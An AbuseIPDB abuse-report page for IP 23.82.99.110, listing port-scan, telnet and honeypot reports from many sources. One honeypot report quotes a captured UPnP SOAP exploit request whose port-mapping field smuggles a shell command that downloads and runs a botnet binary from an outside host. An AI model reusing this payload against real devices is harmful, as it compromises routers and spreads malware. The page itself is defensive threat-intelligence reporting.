JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 23.82.99.110

23.82.99.110 was found in our database!

This IP was reported 37 times. Confidence of Abuse is 100%: ?

100%

ISP	Leaseweb USA, Inc.
Usage Type	Data Center/Web Hosting/Transit
ASN	AS7203
Hostname(s)	110.99.82.23.hosted.by.hostdzire.com
Domain Name	leaseweb.com
Country	🇺🇸 United States of America
City	San Jose, California

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 23.82.99.110

Whois 23.82.99.110

IP Abuse Reports for 23.82.99.110:

This IP address has been reported a total of 37 times from 27 distinct sources. 23.82.99.110 was first reported on June 16th 2026, and the most recent report was 1 day ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇦🇹 urnilxfgbez	2026-06-17 22:45:00 (1 day ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇦🇷 Bruno	2026-06-17 16:32:38 (1 day ago)	Port Scanner: 23.82.99.110	Port Scan
🇫🇷 aki	2026-06-17 15:24:40 (1 day ago)	Drop: ...	Port Scan
🇺🇸 RAP	2026-06-17 12:47:32 (1 day ago)	2026-06-17 12:47:32 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇺🇸 MPL	2026-06-17 12:39:59 (1 day ago)	tcp/23 (2 or more attempts)	Port Scan
🇫🇮 iamxorum	2026-06-17 12:10:30 (1 day ago)	2026-06-17T12:10:30.350523+00:00 XRM-01 kernel: [TELNET-TRAP] IN=eth0 OUT= MAC=92:00:06:e6:da:95:d2: ... show more 2026-06-17T12:10:30.350523+00:00 XRM-01 kernel: [TELNET-TRAP] IN=eth0 OUT= MAC=92:00:06:e6:da:95:d2:74:7f:6e:37:e3:08:00 SRC=23.82.99.110 DST=46.62.222.43 LEN=40 TOS=0x00 PREC=0x00 TTL=39 ID=55172 PROTO=TCP SPT=10779 DPT=23 WINDOW=9336 RES=0x00 SYN URGP=0 ... show less	Port Scan IoT Targeted
🇩🇪 centurion	2026-06-17 11:58:23 (1 day ago)	Blocked by UFW on ns02 [52869/tcp] Source port: 9499 TTL: 47 Packet length: 40 TOS: 0x00 This repor ... show more Blocked by UFW on ns02 [52869/tcp] Source port: 9499 TTL: 47 Packet length: 40 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇮🇩 hermawan	2026-06-17 11:53:41 (1 day ago)	1781697212.505515 23.82.99.110 103.166.156.58 65213__0_0 2026-06-17 18:53:32 WIB ...	Email Spam Hacking
🇳🇱 ByeByte API	2026-06-17 11:42:17 (1 day ago)	byebyte.space auth: TCP packet to port 52869 (high-risk service) at 2026-06-17T11:42:17Z. Source por ... show more byebyte.space auth: TCP packet to port 52869 (high-risk service) at 2026-06-17T11:42:17Z. Source port 63170. TCP flags: SYN. Packet: 40B, TTL 50, window 62857, IP id 14173. Single packet, dropped at firewall. p0f: 14 hops. show less	Port Scan
🇬🇧 gbzret4d	2026-06-17 11:03:55 (1 day ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot
🇺🇸 MPL	2026-06-17 11:02:45 (1 day ago)	tcp/23 (3 or more attempts)	Port Scan
🇺🇸 Robert Gilliam	2026-06-17 10:48:04 (1 day ago)	Port scan / honeypot hit on ny.robgilm.com	Port Scan
🇳🇱 VMHeaven.io	2026-06-17 10:39:14 (1 day ago)	Blocked by UFW [23/tcp] Source port: 20100 TTL: 50 Packet length: 40	Port Scan Hacking Brute-Force
Anonymous	2026-06-17 10:25:26 (1 day ago)	PROTO=TCP DPT=23	Port Scan Hacking
🇩🇪 Justin F. \| AS204464	2026-06-17 09:40:37 (1 day ago)	Honeypot [nx-infrastructure]: Empty payload (likely service probe); 2323 [3] TCP Reported by: Justin ... show more Honeypot [nx-infrastructure]: Empty payload (likely service probe); 2323 [3] TCP Reported by: Justin F. show less	Port Scan

Showing 1 to 15 of 37 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 147.185.132.180

🇺🇸 66.132.186.208

🇳🇱 45.148.10.151

🇬🇧 35.203.210.38

🇺🇸 172.173.67.22

🇫🇷 91.231.89.211

🇺🇸 45.8.19.63

🇬🇪 194.31.8.12

🇱🇹 81.30.98.44

🇲🇽 187.174.238.116

🇮🇳 182.79.86.102

🇸🇬 167.172.93.203

🇫🇷 92.103.134.183

🇩🇪 51.75.64.35

🇨🇳 47.104.232.1

🇺🇸 198.62.4.16

🇰🇭 175.100.107.238

🇺🇸 92.119.36.99

🇬🇧 35.203.210.156

🇰🇭 220.158.234.201